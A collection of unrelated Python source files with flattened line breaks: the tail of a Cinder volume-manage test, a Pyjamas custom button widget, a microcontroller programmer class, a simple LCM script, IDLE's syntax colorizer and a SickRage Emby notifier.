'fake_ref', 'volume_type': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'}} res = self._get_resp(body) self.assertEqual(res.status_int, 202, res) pass @mock.patch('cinder.volume.api.API.manage_existing', api_manage) def test_manage_volume_volume_type_by_name(self): """Tests for correct operation when a volume type is specified by name. We wrap cinder.volume.api.API.manage_existing so that managing is not actually attempted. """ body = {'volume': {'host': 'host_ok', 'ref': 'fake_ref', 'volume_type': 'good_fakevt'}} res = self._get_resp(body) self.assertEqual(res.status_int, 202, res) pass def test_manage_volume_bad_volume_type_by_uuid(self): """Test failure on nonexistent volume type specified by ID.""" body = {'volume': {'host': 'host_ok', 'ref': 'fake_ref', 'volume_type': 'bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb'}} res = self._get_resp(body) self.assertEqual(res.status_int, 404, res) pass def test_manage_volume_bad_volume_type_by_name(self): """Test failure on nonexistent volume type specified by name.""" body = {'volume': {'host': 'host_ok', 'ref': 'fake_ref', 'volume_type': 'bad_fakevt'}} res = self._get_resp(body) self.assertEqual(res.status_int, 404, res) pass
# Copyright Pyjamas Team # Copyright (C) 2009 Luke Kenneth Casson Leighton <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the License. You may obtain a copy of # the License at # # http:/www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. import sys from pyjamas import DOM from pyjamas import Factory from pyjamas.ui import Event from ButtonBase import ButtonBase from pyjamas.ui import Focus from UIObject import UIObject """ Custom Button is a base button class with built in support for a set number of button faces. Each face has its own style modifier. For example, the state for down and hovering is assigned the CSS modifier down-hovering. So, if the button's overall style name is gwt-PushButton then when showing the down-hovering face, the button's style is gwt-PushButton-down-hovering. The overall style name can be used to change the style of the button irrespective of the current face. Each button face can be assigned is own image, text, or html contents. If no content is defined for a face, then the face will use the contents of another face. For example, if down-hovering does not have defined contents, it will use the contents defined by the down face. The supported faces are defined below: CSS | Getter method | description of face | delegateTo -------------+---------------------+-------------------------------------------+--------- up |getUpFace() |face shown when button is up |none down |getDownFace() |face shown when button is down | up up-hovering |getUpHoveringFace() |face shown when button is up and hovering | up up-disabled |getUpDisabledFace() |face shown when button is up and disabled | up down-hovering|getDownHoveringFace()|face shown when button is down and hovering|down down-disabled|getDownDisabledFace()|face shown when button is down and disabled|down """ class Face: STYLENAME_HTML_FACE = "html-face" def __init__(self, button, delegateTo = None): """ Constructor for Face. Creates a face that delegates to the supplied face. @param delegateTo default content provider """ self.button = button self.delegateTo = delegateTo self.face = None # TODO it is likely required. Im beginner in java/gwt source. self.id = None # TODO self.name = "fazom" # TODO def getName(self): # FIXME """Returns with a known face's name""" return self.name def getFaceID(self): # FIXME """Returns with the face's id""" return self.id def setName(self, name): # FIXME """Sets the face's name""" self.name = name return def setFaceID(self, face_id): # FIXME """Sets the face's id""" self.id = face_id return def getHTML(self): """Gets the face's contents as html.""" return DOM.getInnerHTML(self.getFace()) def getText(self): """Gets the face's contents as text.""" return DOM.getInnerText(self.getFace()) def setHTML(self, html): """Set the face's contents as html.""" self.face = DOM.createDiv() UIObject.setStyleName(self.button, self.face, self.STYLENAME_HTML_FACE, True) DOM.setInnerHTML(self.face, html) self.button.updateButtonFace() def setImage(self, image): """ Set the face's contents as an image. @param image image to set as face contents """ self.face = image.getElement() self.button.updateButtonFace() def setText(self, text): """ Sets the face's contents as text. @param text text to set as face's contents """ self.face = DOM.createDiv() UIObject.setStyleName(self.button, self.face, self.STYLENAME_HTML_FACE, True) DOM.setInnerText(self.face, text) self.button.updateButtonFace() def toString(self): return self.getName() def getFace(self): """Gets the contents associated with this face.""" if self.face is None: if self.delegateTo is None: # provide a default face as none was supplied. self.face = DOM.createDiv() return self.face else: return self.delegateTo.getFace() else: return self.face class CustomButton (ButtonBase): """ Represents a button's face. Each face is associated with its own style modifier and, optionally, its own contents html, text, or image. """ STYLENAME_DEFAULT = "gwt-CustomButton" DOWN_ATTRIBUTE = 1 # Pressed Attribute bit. HOVERING_ATTRIBUTE = 2 # Hovering Attribute bit. DISABLED_ATTRIBUTE = 4 # Disabled Attribute bit. UP = 0 # ID for up face. DOWN = DOWN_ATTRIBUTE # 1 ID for down face. UP_HOVERING = HOVERING_ATTRIBUTE # 2 ID for upHovering face. DOWN_HOVERING = DOWN_ATTRIBUTE | HOVERING_ATTRIBUTE # 3 ID for downHovering face. UP_DISABLED = DISABLED_ATTRIBUTE # 4 ID for upDisabled face. DOWN_DISABLED = DOWN | DISABLED_ATTRIBUTE # 5 ID for downDisabled face. """ Calling possibilities: def __init__(self, upImage): def __init__(self, upImage, listener): def __init__(self, upImage, downImage): def __init__(self, upImage, downImage, listener): def __init__(self, upText): def __init__(self, upText, listener): def __init__(self, upText, downText): def __init__(self, upText, downText, listener): def __init__(self): TODO: I do not know how to handle the following cases: def __init__(self, upImage, listener): def __init__(self, upText, listener): So how can I make difference between listener and downImage/downText ? """ def __init__(self, upImageText = None, downImageText=None, listener = None, **kwargs): """Constructor for CustomButton.""" if not kwargs.has_key('StyleName'): kwargs['StyleName']=self.STYLENAME_DEFAULT if kwargs.has_key('Element'): # XXX FIXME: createFocusable is used for a reason... element = kwargs.pop('Element') else: element = Focus.createFocusable() ButtonBase.__init__(self, element, **kwargs) self.curFace = None # The button's current face. self.curFaceElement = None # No "undefined" anymore self.up = None # Face for up. self.down = None # Face for down. self.downHovering = None # Face for downHover. self.upHovering = None # Face for upHover. self.upDisabled = None # Face for upDisabled. self.downDisabled = None # Face for downDisabled. self.isCapturing = False # If True, this widget is capturing with # the mouse held down. self.isFocusing = False # If True, this widget has focus with the space bar down. self.allowClick = False # Used to decide whether to allow clicks to # propagate up to the superclass or container elements. self.setUpFace(self.createFace(None, "up", self.UP)) #self.getUpFace().setText("Not initialized yet:)") #self.setCurrentFace(self.getUpFace()) # Add a11y role "button" # XXX: TODO Accessibility # TODO: pyjslib.isinstance if downImageText is None and listener is None: listener = upImageText upImageText = None if upImageText and isinstance(upImageText, str): upText = upImageText upImage = None else: upImage = upImageText upText = None if downImageText and isinstance(downImageText, str): downText = downImageText downImage = None else: downImage = downImageText downText = None #self.getUpFace().setText("Just a test") if upImage: self.getUpFace().setImage(upImage) if upText: self.getUpFace().setText(upText) if downImage: self.getDownFace().setImage(downImage) if downText: self.getDownFace().setText(downText) # set the face DOWN #self.setCurrentFace(self.getDownFace()) # set the face UP #self.setCurrentFace(self.getUpFace()) self.sinkEvents(Event.ONCLICK | Event.MOUSEEVENTS | Event.FOCUSEVENTS | Event.KEYEVENTS) if listener: self.addClickListener(listener) def updateButtonFace(self): if self.curFace is not None and \ self.curFace.getFace() == self.getFace(): self.setCurrentFaceElement(self.face) def getDownDisabledFace(self): """Gets the downDisabled face of the button.""" if self.downDisabled is None: self.setDownDisabledFace(self.createFace(self.getDownFace(), "down-disabled", self.DOWN_DISABLED)) return self.downDisabled def getDownFace(self): """Gets the down face of the button.""" if self.down is None: self.setDownFace(self.createFace(self.getUpFace(), "down", self.DOWN)) return self.down def getDownHoveringFace(self): """Gets the downHovering face of the button.""" if self.downHovering is None: self.setDownHoveringFace(self.createFace(self.getDownFace(), "down-hovering", self.DOWN_HOVERING)) return self.downHovering def getHTML(self): """Gets the current face's html.""" return self.getCurrentFace().getHTML() def getTabIndex(self): return Focus.getTabIndex(self.getElement()) def getText(self): """Gets the current face's text.""" return self.getCurrentFace().getText() def getUpDisabledFace(self): """Gets the upDisabled face of the button.""" if self.upDisabled is None: self.setUpDisabledFace(self.createFace(self.getUpFace(), "up-disabled", self.UP_DISABLED)) return self.upDisabled def getUpFace(self): """Gets the up face of the button.""" return self.up # self.up must be always initialized def getUpHoveringFace(self): """Gets the upHovering face of the button.""" if self.upHovering is None: self.setUpHoveringFace(self.createFace(self.getUpFace(), "up-hovering", self.UP_HOVERING)) return self.upHovering def onBrowserEvent(self, event): # Should not act on button if disabled. if not self.isEnabled(): # This can happen when events are bubbled up from # non-disabled children return event_type = DOM.eventGetType(event) if event_type == "click": # If clicks are currently disallowed, keep it from bubbling or # being passed to the superclass. if not self.allowClick: DOM.eventStopPropagation(event) return elif event_type == "mousedown": if DOM.eventGetButton(event) == Event.BUTTON_LEFT: self.setFocus(True) self.onClickStart() DOM.setCapture(self.getElement()) self.isCapturing = True # Prevent dragging (on some browsers) DOM.eventPreventDefault(event) elif event_type == "mouseup": if self.isCapturing: self.isCapturing = False DOM.releaseCapture(self.getElement()) if self.isHovering() and \ DOM.eventGetButton(event) == Event.BUTTON_LEFT: self.onClick() elif event_type == "mousemove": if self.isCapturing: # Prevent dragging (on other browsers) DOM.eventPreventDefault(event) elif event_type == "mouseout": to = DOM.eventGetToElement(event) if (DOM.isOrHasChild(self.getElement(), DOM.eventGetTarget(event)) and (to is None or not DOM.isOrHasChild(self.getElement(), to))): if self.isCapturing: self.onClickCancel() self.setHovering(False) elif event_type == "mouseover": if DOM.isOrHasChild(self.getElement(), DOM.eventGetTarget(event)): self.setHovering(True) if self.isCapturing: self.onClickStart() elif event_type == "blur": if self.isFocusing: self.isFocusing = False self.onClickCancel() elif event_type == "losecapture": if self.isCapturing: self.isCapturing = False self.onClickCancel() ButtonBase.onBrowserEvent(self, event) # Synthesize clicks based on keyboard events AFTER the normal # key handling. if (DOM.eventGetTypeInt(event) & Event.KEYEVENTS) != 0: keyCode = DOM.eventGetKeyCode(event) if event_type == "keydown": if keyCode == ' ': self.isFocusing = True self.onClickStart() elif event_type == "keyup": if self.isFocusing and keyCode == ' ': self.isFocusing = False self.onClick() elif event_type == "keypress": if keyCode == '\n' or keyCode == '\r': self.onClickStart() self.onClick() def setAccessKey(self, key): # TODO: accessibility # Focus.setAccessKey(self.getElement(), key) pass def setEnabled(self, enabled): """Sets whether this button is enabled.""" if self.isEnabled() != enabled: self.toggleDisabled() ButtonBase.setEnabled(self, enabled) if not enabled: self.cleanupCaptureState() # XXX - TODO: Accessibility else: self.setAriaPressed(self.getCurrentFace()) def setFocus(self, focused): if focused: Focus.focus(self.getElement()) else: Focus.blur(self.getElement()) def setHTML(self, html): """Sets the current face's html.""" self.getCurrentFace().setHTML(html) def setTabIndex(self, index): Focus.setTabIndex(self.getElement(), index) def setText(self, text): """Sets the current face's text.""" self.getCurrentFace().setText(text) def isDown(self): """Is this button down?""" # 0->0, 1->1, 2->0, 3->1, 4->0, 5->1 return (self.DOWN_ATTRIBUTE & self.getCurrentFace().getFaceID()) > 0 def onAttach(self): """ Overridden on attach to ensure that a button face has been chosen before the button is displayed. """ self.finishSetup() ButtonBase.onAttach(self) def onClick(self, sender=None): """ Called when the user finishes clicking on this button. The default behavior is to fire the click event to listeners. Subclasses that override onClickStart() should override this method to restore the normal widget display. """ # Allow the click we're about to synthesize to pass through to the # superclass and containing elements. Element.dispatchEvent() is # synchronous, so we simply set and clear the flag within this method. self.allowClick = True # Mouse coordinates are not always available (e.g., when the click is # caused by a keyboard event). evt = None # we NEED to initialize evt, to be in the same namespace # as the evt *inside* of JS block # We disallow setting the button here, because IE doesn't provide the # button property for click events. # there is a good explanation about all the arguments of initMouseEvent # at: https://developer.mozilla.org/En/DOM:event.initMouseEvent DOM.buttonClick(self.getElement()) self.allowClick = False def onClickCancel(self): """ Called when the user aborts a click in progress; for example, by dragging the mouse outside of the button before releasing the mouse button. Subclasses that override onClickStart() should override this method to restore the normal widget display. """ pass def onClickStart(self): """ Called when the user begins to click on this button. Subclasses may override this method to display the start of the click visually; such subclasses should also override onClick() and onClickCancel() to restore normal visual state. Each onClickStart will eventually be followed by either onClick or onClickCancel, depending on whether the click is completed. """ pass def onDetach(self): ButtonBase.onDetach(self) self.cleanupCaptureState() def setDown(self, down): """Sets whether this button is down.""" if down != self.isDown(): self.toggleDown() def finishSetup(self): #default """Common setup between constructors.""" if self.curFace is None: self.setCurrentFace(self.getUpFace()) def fireClickListeners(self, nativeEvent): # TODO(ecc) Once event triggering is committed, should fire a # click event instead. self.fireEvent(ClickEvent()) # TODO: ??? def fireEvent(self): # TODO: there is no standard mechanism in pyjamas? pass def getCurrentFace(self): """ Gets the current face of the button. Implementation note: Package so we can use it when testing the button. """ self.finishSetup() return self.curFace def isHovering(self): """Is the mouse hovering over this button? Returns True""" return (self.HOVERING_ATTRIBUTE & self.getCurrentFace().getFaceID()) > 0 def setHovering(self, hovering): """Sets whether this button is hovering.""" if hovering != self.isHovering(): # TODO self.toggleHover() def toggleDown(self): """Toggle the up/down attribute.""" newFaceID = self.getCurrentFace().getFaceID() ^ self.DOWN_ATTRIBUTE self.setCurrentFaceFromID(newFaceID) # newFaceId: 0,1,2,3,4,5 def cleanupCaptureState(self): """ Resets internal state if this button can no longer service events. This can occur when the widget becomes detached or disabled. """ if self.isCapturing or self.isFocusing: DOM.releaseCapture(self.getElement()) self.isCapturing = False self.isFocusing = False self.onClickCancel() def createFace(self, delegateTo, name, faceID): # TODO: name and faceID # TODO: maybe no need to break it into this pieces face = Face(self, delegateTo) face.setName(name) face.setFaceID(faceID) return face def getFaceFromID(self, face_id): if (face_id == self.DOWN): return self.getDownFace() elif(face_id == self.UP): return self.getUpFace() elif (face_id == self.DOWN_HOVERING): return self.getDownHoveringFace() elif (face_id == self.UP_HOVERING): return self.getUpHoveringFace() elif (face_id == self.UP_DISABLED): return self.getUpDisabledFace() elif (face_id == self.DOWN_DISABLED): return self.getDownDisabledFace() else: print id, " is not a known face id." # TODO ??? def setAriaPressed(self, newFace): pressed = (newFace.getFaceID() & self.DOWN_ATTRIBUTE) == 1 # XXX: TODO Accessibility def setCurrentFace(self, newFace): """Implementation note: default access for testing.""" if self.curFace != newFace: if self.curFace is not None: self.removeStyleDependentName(self.curFace.getName()) self.curFace = newFace self.setCurrentFaceElement(newFace.getFace()); self.addStyleDependentName(self.curFace.getName()) if self.isEnabled: self.setAriaPressed(newFace) #self.updateButtonFace() # TODO: should we comment out? self.style_name = self.getStyleName() def setCurrentFaceFromID(self, faceID): """Sets the current face based on the faceID.""" # this is a new method compared by gwt. Likely to be removed. newFace = self.getFaceFromID(faceID) self.setCurrentFace(newFace) def setCurrentFaceElement(self, newFaceElement): # XXX: TODO if self.curFaceElement != newFaceElement: if self.curFaceElement is not None: DOM.removeChild(self.getElement(), self.curFaceElement) self.curFaceElement = newFaceElement DOM.appendChild(self.getElement(), self.curFaceElement) def setDownDisabledFace(self, downDisabled): """Sets the downDisabled face of the button.""" self.downDisabled = downDisabled def setDownFace(self, down): """Sets the down face of the button.""" self.down = down def setDownHoveringFace(self, downHovering): """Sets the downHovering face of the button.""" self.downHovering = downHovering def setUpDisabledFace(self, upDisabled): """Sets the upDisabled face of the button.""" self.upDisabled = upDisabled def setUpFace(self, up): """Sets the up face of the button.""" self.up = up def setUpHoveringFace(self, upHovering): """Sets the upHovering face of the button.""" self.upHovering = upHovering def toggleDisabled(self): """Toggle the disabled attribute.""" # Toggle disabled. newFaceID = self.getCurrentFace().getFaceID() ^ self.DISABLED_ATTRIBUTE # Remove hovering. newFaceID &= ~self.HOVERING_ATTRIBUTE # Sets the current face. self.setCurrentFaceFromID(newFaceID) def toggleHover(self): """Toggle the hovering attribute.""" # Toggle hovering. newFaceID = self.getCurrentFace().getFaceID() ^ self.HOVERING_ATTRIBUTE # Remove disabled. newFaceID &= ~self.DISABLED_ATTRIBUTE self.setCurrentFaceFromID(newFaceID) Factory.registerClass('pyjamas.ui.CustomButton', CustomButton)
import binascii import hexutils from ihex import IHex import os.path from pgm_error import PgmError from protocol import Protocol import time class Operations: def __init__(self, part, io, sync=True): """part - Part object, io - *IO object. If sync is True do protocol synchronization (if supported by device.""" self._part = part self._io = io protocolPath = self._part.getProtocolFileName(self._io.getHardware()) protocolPath = os.path.join('ProtocolDescriptionFiles', protocolPath) self._protocol = Protocol(protocolPath) self._wdelay = 1 """Write delay hack""" if sync: self.opSync() def _opDotOperation(self, operation, **argv): """Common function for operation with no result.""" cmd = self._protocol.getCmd(operation, **argv) self._opDotCmd(cmd) def _opDotCmd(self, cmd): """Common function for operation with no result.""" self._io.send(cmd) data = self._io.recv() if data != '.': raise PgmError("Invalid response, expected '.' got: %s" % data) def opBlankCheck(self, addr_start, size=None): if size is None: size = self._part.getMemory('FLASH').getSize() - addr_start addr = addr_start addr_hi_prev = None while size > 0: addr_hi, addr_lo = divmod(addr, 0x10000) if addr_hi != addr_hi_prev: addr_hi_prev = addr_hi cmd = self._protocol.getCmd('select_memory_page', PPPP=addr_hi) self._opDotCmd(cmd) addr_end = addr_lo + size - 1 if addr_end >= 0x10000: addr_end = 0xffff cmd = self._protocol.getCmd('blank_check', PPPP=addr_lo, QQQQ=addr_end) self._opDotCmd(cmd) addr = addr_hi * 0x10000 + addr_end + 1 size = size - (addr_end - addr_lo + 1) def opErase(self): self._opDotOperation('erase') self._wdelayHack() def opMemory(self, name): self._memory_name = name operation = 'select_memory_' + name.lower() self._opDotOperation(operation) def opProgram(self, data, addr_start=0): addr_hi_prev = None addr = addr_start while data: addr_hi, addr_lo = divmod(addr, 0x10000) if addr_hi != addr_hi_prev: addr_hi_prev = addr_hi cmd = self._protocol.getCmd('select_memory_page', PPPP=addr_hi) self._opDotCmd(cmd) addr_end = addr_lo + len(data) if addr_end >= 0x10000: addr_end = 0xffff size = addr_end + 1 - addr_lo buf, data = data[:size], data[size:] cmd = self._protocol.getCmd('program_start', PPPP=addr_lo, QQQQ=addr_end) self._opDotCmd(cmd) self._wdelayHack() addr = addr + size # send data ihex = IHex() ihex.insert_data(addr_lo, buf) ihex.set_row_bytes(255) buf = ihex.write() # split to lines, remove, empty strings buf = [b for b in buf.splitlines() if b] # remove hex end if file buf = buf[:-1] for d in buf: self._opDotCmd(str(d, 'ascii').upper()) self._wdelayHack() def opRead(self, addr_start, size=None): if size is None: addr_stop = self._part.getMemory(self._memory_name).getSize() else: addr_stop = addr_start + size page_size = self._part.getPageSize() data = '' addr = addr_start addr_hi_prev = None while addr < addr_stop: addr_hi, addr_lo = divmod(addr, 0x10000) if addr_hi != addr_hi_prev: addr_hi_prev = addr_hi cmd = self._protocol.getCmd('select_memory_page', PPPP=addr_hi) self._opDotCmd(cmd) addr_end = addr_lo + page_size - 1 if addr_end > addr_stop: addr_end = addr_stop - 1 if addr_end >= 0x10000: addr_end = 0x10000 - 1 cmd = self._protocol.getCmd('read_memory', PPPP=addr_lo, QQQQ=addr_end) self._io.send(cmd) r_addr = addr while addr_lo <= addr_end: buf = self._io.recv() # AAAA=ddddddd.... r_addr, r_eq, r_data = buf[:4], buf[4:5], buf[5:] if r_eq != '=': raise PgmError("Expected 'xxxx=...' in :%s" % buf) if r_addr != ("%.4X" % addr_lo): raise PgmError("Invalid address in response got: %s exp: %s data: %s" % (r_addr, addr_lo, bug)) addr_lo = addr_lo + len(r_data) / 2 data = data + r_data addr = addr_hi * 0x10000 + addr_end + 1 return binascii.unhexlify(data) def opStartAppl(self, reset): if reset: cmd = self._protocol.getCmd('startAppliWithReset') else: cmd = self._protocol.getCmd('startAppliWithoutReset') self._io.send(cmd) # read \x00 if follows by reset, or timeout self._io.readRaw(1) def opSync(self): """Called only once to synchronize bytestream.""" if self._protocol.hasCmd('sync'): sync = self._protocol.getCmd('sync') sync = bytes(sync, 'ascii') self._io.writeRaw(sync) r = self._io.readRaw(len(sync)) if r != sync: raise PgmError('Synchronization failed, invalid response: %s' % r) def _wdelayHack(self): time.sleep(self._wdelay)
# Farooqui Conjecture.py # Imaad Farooqui # Farooqui Conjecture LCM # Modules import math from time import sleep # LCM Function def LCM(num1, num2): stop = 0 # Set Variables # Find biggest value if(num1>num2): maximum = math.ceil(0.5 * num1) bigger = 1 else: maximum = math.ceil(0.5 * num2) bigger = 2 # Check if x goes into y if(bigger == 1): if(num1 % num2 == 0): x = num1 print(x) stop = 1 else: if(num2 % num1 == 0): x = num2 print(x) stop = 1 while(stop == 0): #Forever Loop if(num1 % maximum == 0 and num2 % maximum == 0): # Check for common divisor a = maximum break maximum = maximum - 1 # Decrease value of maximum if(maximum == 1): a = 1 break # Output if not already calculated if(stop == 0): # If not already calculated if(a == 1): print(num1 * num2) # x * y else: print((num1 / a) * (num2 / a) * (a)) # x * y * a while(1 == 1): #Forever Loop # Variable Setup choicea = 0 choiceb = 0 # User Input ## Choice 1 while(choicea == 0 or choicea < 1 or choicea % 1 != 0): choicea = float(input("Choose you first interger.\n")) ## Choice 2 while(choiceb == 0 or choiceb < 1 or choiceb % 1 != 0): choiceb = float(input("Choose you second interger.\n")) # Perform LCM Function LCM(choicea, choiceb)
import time import re import keyword import __builtin__ from Tkinter import * from idlelib.Delegator import Delegator from idlelib.configHandler import idleConf DEBUG = False def any(name, alternates): "Return a named group pattern matching list of alternates." return "(?P<%s>" % name + "|".join(alternates) + ")" def make_pat(): kw = r"\b" + any("KEYWORD", keyword.kwlist) + r"\b" builtinlist = [str(name) for name in dir(__builtin__) if not name.startswith('_')] # self.file = file("file") : # 1st 'file' colorized normal, 2nd as builtin, 3rd as string builtin = r"([^.'\"\\#]\b|^)" + any("BUILTIN", builtinlist) + r"\b" comment = any("COMMENT", [r"#[^\n]*"]) stringprefix = r"(\br|u|ur|R|U|UR|Ur|uR|b|B|br|Br|bR|BR)?" sqstring = stringprefix + r"'[^'\\\n]*(\\.[^'\\\n]*)*'?" dqstring = stringprefix + r'"[^"\\\n]*(\\.[^"\\\n]*)*"?' sq3string = stringprefix + r"'''[^'\\]*((\\.|'(?!''))[^'\\]*)*(''')?" dq3string = stringprefix + r'"""[^"\\]*((\\.|"(?!""))[^"\\]*)*(""")?' string = any("STRING", [sq3string, dq3string, sqstring, dqstring]) return kw + "|" + builtin + "|" + comment + "|" + string +\ "|" + any("SYNC", [r"\n"]) prog = re.compile(make_pat(), re.S) idprog = re.compile(r"\s+(\w+)", re.S) asprog = re.compile(r".*?\b(as)\b") class ColorDelegator(Delegator): def __init__(self): Delegator.__init__(self) self.prog = prog self.idprog = idprog self.asprog = asprog self.LoadTagDefs() def setdelegate(self, delegate): if self.delegate is not None: self.unbind("<<toggle-auto-coloring>>") Delegator.setdelegate(self, delegate) if delegate is not None: self.config_colors() self.bind("<<toggle-auto-coloring>>", self.toggle_colorize_event) self.notify_range("1.0", "end") def config_colors(self): for tag, cnf in self.tagdefs.items(): if cnf: self.tag_configure(tag, **cnf) self.tag_raise('sel') def LoadTagDefs(self): theme = idleConf.GetOption('main','Theme','name') self.tagdefs = { "COMMENT": idleConf.GetHighlight(theme, "comment"), "KEYWORD": idleConf.GetHighlight(theme, "keyword"), "BUILTIN": idleConf.GetHighlight(theme, "builtin"), "STRING": idleConf.GetHighlight(theme, "string"), "DEFINITION": idleConf.GetHighlight(theme, "definition"), "SYNC": {'background':None,'foreground':None}, "TODO": {'background':None,'foreground':None}, "BREAK": idleConf.GetHighlight(theme, "break"), "ERROR": idleConf.GetHighlight(theme, "error"), # The following is used by ReplaceDialog: "hit": idleConf.GetHighlight(theme, "hit"), } if DEBUG: print 'tagdefs',self.tagdefs def insert(self, index, chars, tags=None): index = self.index(index) self.delegate.insert(index, chars, tags) self.notify_range(index, index + "+%dc" % len(chars)) def delete(self, index1, index2=None): index1 = self.index(index1) self.delegate.delete(index1, index2) self.notify_range(index1) after_id = None allow_colorizing = True colorizing = False def notify_range(self, index1, index2=None): self.tag_add("TODO", index1, index2) if self.after_id: if DEBUG: print "colorizing already scheduled" return if self.colorizing: self.stop_colorizing = True if DEBUG: print "stop colorizing" if self.allow_colorizing: if DEBUG: print "schedule colorizing" self.after_id = self.after(1, self.recolorize) close_when_done = None # Window to be closed when done colorizing def close(self, close_when_done=None): if self.after_id: after_id = self.after_id self.after_id = None if DEBUG: print "cancel scheduled recolorizer" self.after_cancel(after_id) self.allow_colorizing = False self.stop_colorizing = True if close_when_done: if not self.colorizing: close_when_done.destroy() else: self.close_when_done = close_when_done def toggle_colorize_event(self, event): if self.after_id: after_id = self.after_id self.after_id = None if DEBUG: print "cancel scheduled recolorizer" self.after_cancel(after_id) if self.allow_colorizing and self.colorizing: if DEBUG: print "stop colorizing" self.stop_colorizing = True self.allow_colorizing = not self.allow_colorizing if self.allow_colorizing and not self.colorizing: self.after_id = self.after(1, self.recolorize) if DEBUG: print "auto colorizing turned",\ self.allow_colorizing and "on" or "off" return "break" def recolorize(self): self.after_id = None if not self.delegate: if DEBUG: print "no delegate" return if not self.allow_colorizing: if DEBUG: print "auto colorizing is off" return if self.colorizing: if DEBUG: print "already colorizing" return try: self.stop_colorizing = False self.colorizing = True if DEBUG: print "colorizing..." t0 = time.clock() self.recolorize_main() t1 = time.clock() if DEBUG: print "%.3f seconds" % (t1-t0) finally: self.colorizing = False if self.allow_colorizing and self.tag_nextrange("TODO", "1.0"): if DEBUG: print "reschedule colorizing" self.after_id = self.after(1, self.recolorize) if self.close_when_done: top = self.close_when_done self.close_when_done = None top.destroy() def recolorize_main(self): next = "1.0" while True: item = self.tag_nextrange("TODO", next) if not item: break head, tail = item self.tag_remove("SYNC", head, tail) item = self.tag_prevrange("SYNC", head) if item: head = item[1] else: head = "1.0" chars = "" next = head lines_to_get = 1 ok = False while not ok: mark = next next = self.index(mark + "+%d lines linestart" % lines_to_get) lines_to_get = min(lines_to_get * 2, 100) ok = "SYNC" in self.tag_names(next + "-1c") line = self.get(mark, next) ##print head, "get", mark, next, "->", repr(line) if not line: return for tag in self.tagdefs.keys(): self.tag_remove(tag, mark, next) chars = chars + line m = self.prog.search(chars) while m: for key, value in m.groupdict().items(): if value: a, b = m.span(key) self.tag_add(key, head + "+%dc" % a, head + "+%dc" % b) if value in ("def", "class"): m1 = self.idprog.match(chars, b) if m1: a, b = m1.span(1) self.tag_add("DEFINITION", head + "+%dc" % a, head + "+%dc" % b) elif value == "import": # color all the "as" words on same line, except # if in a comment; cheap approximation to the # truth if '#' in chars: endpos = chars.index('#') else: endpos = len(chars) while True: m1 = self.asprog.match(chars, b, endpos) if not m1: break a, b = m1.span(1) self.tag_add("KEYWORD", head + "+%dc" % a, head + "+%dc" % b) m = self.prog.search(chars, m.end()) if "SYNC" in self.tag_names(next + "-1c"): head = next chars = "" else: ok = False if not ok: # We're in an inconsistent state, and the call to # update may tell us to stop. It may also change # the correct value for "next" (since this is a # line.col string, not a true mark). So leave a # crumb telling the next invocation to resume here # in case update tells us to leave. self.tag_add("TODO", next) self.update() if self.stop_colorizing: if DEBUG: print "colorizing stopped" return def removecolors(self): for tag in self.tagdefs.keys(): self.tag_remove(tag, "1.0", "end") def main(): from idlelib.Percolator import Percolator root = Tk() root.wm_protocol("WM_DELETE_WINDOW", root.quit) text = Text(background="white") text.pack(expand=1, fill="both") text.focus_set() p = Percolator(text) d = ColorDelegator() p.insertfilter(d) root.mainloop() if __name__ == "__main__": main()
# Author: Nic Wolfe <[email protected]> # URL: http://code.google.com/p/sickbeard/ # # This file is part of SickRage. # # SickRage is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # SickRage is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with SickRage. If not, see <http://www.gnu.org/licenses/>. import urllib import urllib2 import sickbeard from sickbeard import logger from sickbeard.exceptions import ex try: import json except ImportError: import simplejson as json class EMBYNotifier: def _notify_emby(self, message, host=None, emby_apikey=None): """Handles notifying Emby host via HTTP API Returns: Returns True for no issue or False if there was an error """ # fill in omitted parameters if not host: host = sickbeard.EMBY_HOST if not emby_apikey: emby_apikey = sickbeard.EMBY_APIKEY url = 'http://%s/emby/Notifications/Admin' % (host) values = {'Name': 'SickRage', 'Description': message, 'ImageUrl': 'https://raw.githubusercontent.com/SiCKRAGETV/SickRage/master/gui/slick/images/sickrage-shark-mascot.png'} data = json.dumps(values) try: req = urllib2.Request(url, data) req.add_header('X-MediaBrowser-Token', emby_apikey) req.add_header('Content-Type', 'application/json') response = urllib2.urlopen(req) result = response.read() response.close() logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG) return True except (urllib2.URLError, IOError), e: logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING) return False ############################################################################## # Public functions ############################################################################## def test_notify(self, host, emby_apikey): return self._notify_emby('This is a test notification from SickRage', host, emby_apikey) def update_library(self, show=None): """Handles updating the Emby Media Server host via HTTP API Returns: Returns True for no issue or False if there was an error """ if sickbeard.USE_EMBY: if not sickbeard.EMBY_HOST: logger.log(u'EMBY: No host specified, check your settings', logger.DEBUG) return False if show: if show.indexer == 1: provider = 'tvdb' elif show.indexer == 2: logger.log(u'EMBY: TVRage Provider no longer valid', logger.WARNING) return False else: logger.log(u'EMBY: Provider unknown', logger.WARNING) return False query = '?%sid=%s' % (provider, show.indexerid) else: query = '' url = 'http://%s/emby/Library/Series/Updated%s' % (sickbeard.EMBY_HOST, query) values = {} data = urllib.urlencode(values) try: req = urllib2.Request(url, data) req.add_header('X-MediaBrowser-Token', sickbeard.EMBY_APIKEY) response = urllib2.urlopen(req) result = response.read() response.close() logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG) return True except (urllib2.URLError, IOError), e: logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING) return False notifier = EMBYNotifier
